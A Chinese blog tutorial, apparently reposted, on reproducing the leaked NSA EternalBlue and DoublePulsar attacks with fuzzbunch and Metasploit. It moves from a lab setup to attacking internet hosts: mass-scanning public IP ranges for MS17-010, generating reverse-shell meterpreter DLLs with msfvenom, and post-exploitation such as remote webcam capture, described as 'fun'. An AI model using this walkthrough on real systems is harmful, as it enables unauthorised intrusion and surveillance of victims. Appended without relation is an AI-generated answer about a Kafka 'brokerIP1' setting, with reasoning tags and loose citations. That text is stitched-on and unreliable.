Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP

影子经纪人公开NSA的黑客工具,威胁全球70%的Windows机器。文章详细介绍如何使用fuzzbunch工具复现攻击,包括环境搭建、工具使用及对外网的攻击流程,同时涉及Python、Metasploit等技术。

0x01 前言

4月14日,影子经纪人在steemit.com上公开了一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间,全世界70%的windows服务器置于危险之中,国内使用windows服务器的高校、国企甚至政府机构也不能幸免。
据了解,受影响的Windows 版本包括Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等。
正在使用这些Windows操作系统的你,有没有在颤抖!!虽然微软宣布已修复大部分的漏洞,但这场由于远程漏洞泄露造成的灾难性网络大地震“余震”仍在。
 
 成功的条件 靶机必须要关闭防火墙 且操作系统要低于win10 攻击机1 要关闭防火墙

0x02 fuzzbunch工具复现

攻击机1:win7 win8或者winxp(没测试过xp,应该也可以实现) ,并且要安装python2.6以及pywin32.exe     192.168.46.129
攻击机2:kali2.0 metasploit  192.168.46.131
靶机3:winxp   192.168.46.132
首先先运行工具包中的fb.py

然后需要输入你的攻击地址 也就是我们刚开始扫描的靶机

还有回调地址 输入win7的ip地址  重定向设置为 no  然后询问你是否创建文件 如果有则不创建 没有则创建文件 一路回车

use Eternalblue模块

然后一路回车到让你选择操作系统和模式 操作系统根据实际情况而定 但是模式要选择FB模式

一路回车 攻击

当出现win的时候说明攻击成功这时到攻击机2 kali上 先生成攻击文件并且将攻击文件上传至win7的目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll

use exploit/multi/handler 模块 

将LHOST 设置成攻击机2 kali的ip 192.168.46.131

LPORT 设置为5555

exploit进行监听

返回攻击机1 win7

use doubleplusar模块

一路回车到

选择smb模式 x86系统 RunDLL 中填入开始生成文件的位置

一路回车 ATTACK

返回kali可以看到成功了

 

0x03 攻击外网

1.准备环境
攻击机1:vmware12.0中的win7+python2.6+pywin32win10+PentestBox-with-Metasploit
攻击机2:win10+PentestBox-with-Metasploit
2.win7连接外网
因为我们的目的是打外网,所以就需要win7也连接外网,首先将点击vmware左上角虚拟机中的设置选项,点击网络适配器,点击桥接模式,确定
 

然后点击编辑中的虚拟网络编辑器,点击更改设置,点桥接模式,确定,就可以连接另外一个宽带了

3.攻击机2准备工作

由于kaLi连接宽带比较麻烦,故我选择用本机win10系统作为攻击机2,这里安装PentestBox-with-Metasploit 这个软件是集成了metasploit,burpsuite等工具的测试环境,很好用,下载链接自行百度

然后 我们可以用msf大批量扫描网段  use auxiliary/scanner/smb/smb_ms17_010 这个模块

如果发现自己没有这个模块 在github上下载 https://github.com/rapid7/metasploit-framework/releases

然后将压缩包中 modules\auxiliary\scanner\smb\smb_ms17_010文件复制到pentestBox相应的地方就好了 这个模块就可以大批量扫描有这个漏洞 445端口的ip

可以用show options查看用法

set RHOST 设置你需要扫描的ip   111.111.111.1/24 

set RPORT 扫描端口 445

set THREADS 设置线程不要超过16  这里设置15

run 运行 就可以扫描了

黄色感叹号表示  可能有漏洞 可以利用

然后我们利用 use exploit/multi/handler  这个后门模块 监听自己的5555端口

将LHOST 设置成攻击机2 win10的ip

LPORT 设置为5555

exploit进行监听

4.攻击机1 win7准备工作

运行fb.py 

然后需要输入你的攻击地址 也就是我们刚开始扫描的靶机

还有回调地址 输入win7的ip地址  重定向设置为 no  然后询问你是否创建文件 如果有则不创建 没有则创建文件 一路回车

然后 use Eternalblue 也是一路按回车

这里会问你选择 winxp 还是win7win8 这个根据实际情况来定 一定要选择FB模式 

之后也是一路回车

 如果显示win的话表示成功

这里 use Doublepulsar模块 也是回车

选择SMB模式  x64位(操作系统位数) 这个也是根据情况来定

经过测试发现64位和32位的payload不一样payload生成方法 在kali中

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=攻击机2的地址LPORT=5555 -f dll > go_x64.dll  生成64位的dll文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机2的地址LPORT=5555 -f dll > go_x32.dll  生成32位dll文件

并将文件放至攻击机1 win7的c盘目录下

之后我们就回车 进行攻击 成功的话攻击机1会弹shell而且是system权限

后面的自己就可以测试了介绍一些成功后的语句

webcam_list:这个命令可以查看目标机器上是否有网络摄像头,并且列举出来。

webcam_snap:这个命令主要是远程连接目标系统的摄像头。

 screenshot :桌面截图并且保存

等一系列好玩的

转载于:https://www.cnblogs.com/Mrsm1th/p/6741557.html

<think>好的,我现在需要帮助用户解决关于如何正确配置Kafka中的brokerIP1设置为localhost的问题。首先,我需要回忆一下Kafka的相关配置参数,特别是brokerIP1的作用。记得brokerIP1是用来指定broker对外发布的IP地址,客户端会通过这个地址来连接broker。如果设置为localhost,可能会有问题,因为客户端可能无法从外部访问,尤其是在分布式环境中。 接下来,我需要确认用户的需求。用户可能是在本地开发环境测试,所以想用localhost,或者可能误解了这个参数的作用。需要明确正确的配置方法,以及使用场景和潜在的问题。 然后,我需要查阅相关的文档或引用资料。根据用户提供的引用,比如引用[1]提到监听器配置和发布到ZooKeeper的地址,这涉及到broker的监听地址配置。而brokerIP1可能与listeners参数相关,但可能需要更具体的配置方法。 还要注意,引用[3]提到Kafka的基本概念和分布式特性,说明在分布式环境中正确配置网络参数的重要性。引用[2]中的网络参数配置示例可能对调优有帮助,但用户的问题更偏向基础配置。 接下来,我需要组织回答的结构。首先解释brokerIP1的作用,然后给出配置方法,包括配置文件和示例。同时需要强调在开发和生产环境中的不同注意事项,比如开发环境可以用localhost,而生产环境需要真实IP或域名。此外,需要提到常见问题,比如客户端无法连接的情况,以及如何检查配置是否正确。 还要确保使用正确的LaTeX格式,行内公式用$...$,独立公式用$$...$$。不过这个问题可能涉及较少的数学公式,更多是配置指令和代码示例,所以需要正确使用代码块格式。 最后,生成相关问题,帮助用户进一步了解相关配置和优化,比如监听器配置、分布式环境调优等。</think>### 关于 Kafka 配置 `brokerIP1=localhost` 的说明 #### 1. **`brokerIP1` 的作用** - `brokerIP1` 是 Kafka Broker 配置参数,用于指定 Broker 对外发布的 IP 地址(即客户端连接的地址)。若未显式配置,默认使用本机 IP 地址[^3]。 - 若设置为 `localhost`,则 Broker 会向 ZooKeeper 注册 `127.0.0.1:9092` 作为监听地址,**仅允许本地客户端连接**,外部客户端无法访问[^1]。 #### 2. **配置方法** - **修改 `server.properties` 文件**: ```properties # 设置 Broker 对外发布的 IP 地址 brokerIP1=localhost # 监听地址需与发布地址一致(示例配置) listeners=PLAINTEXT://localhost:9092 advertised.listeners=PLAINTEXT://localhost:9092 ``` 此配置适用于**本地开发环境**,例如单机测试或容器化部署[^4]。 - **验证配置**: ```bash ./bin/kafka-topics.sh --list --bootstrap-server localhost:9092 ``` 若成功返回 Topic 列表,则配置生效。 #### 3. **使用场景与注意事项** - **适用场景**: - 本地开发环境(如 IDE 调试)。 - 容器化部署(如 Docker 容器内部通信)[^3]。 - **不适用场景**: - 生产环境或分布式集群(需配置真实 IP 或域名)[^1]。 - 跨网络访问场景(需配置公网可路由地址)[^2]。 #### 4. **常见问题排查** - **客户端连接失败**: - 检查 `advertised.listeners` 是否与 `brokerIP1` 一致。 - 确认防火墙是否放行端口(如 `9092`)。 - **ZooKeeper 注册异常**: - 确保 ZooKeeper 地址正确且可访问。 --- ### §§ 1. **如何配置 Kafka 监听器(`listeners`)以适应不同网络环境?** 2. **在分布式集群中如何优化 Kafka 的网络传输性能?** 3. **Kafka 的 `advertised.listeners` 和 `listeners` 参数有何区别?** --- ### 引用说明 : 监听器配置与 ZooKeeper 注册逻辑相关,需确保发布地址对客户端可见。 : 网络参数调优(如端口配置、连接数限制)直接影响跨节点通信性能。 [^3]: Kafka 的分布式特性要求正确配置网络参数以实现高可用性。 [^4]: 本地测试工具(如 `kafka-topics.sh`)依赖 `bootstrap-server` 地址的准确性。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值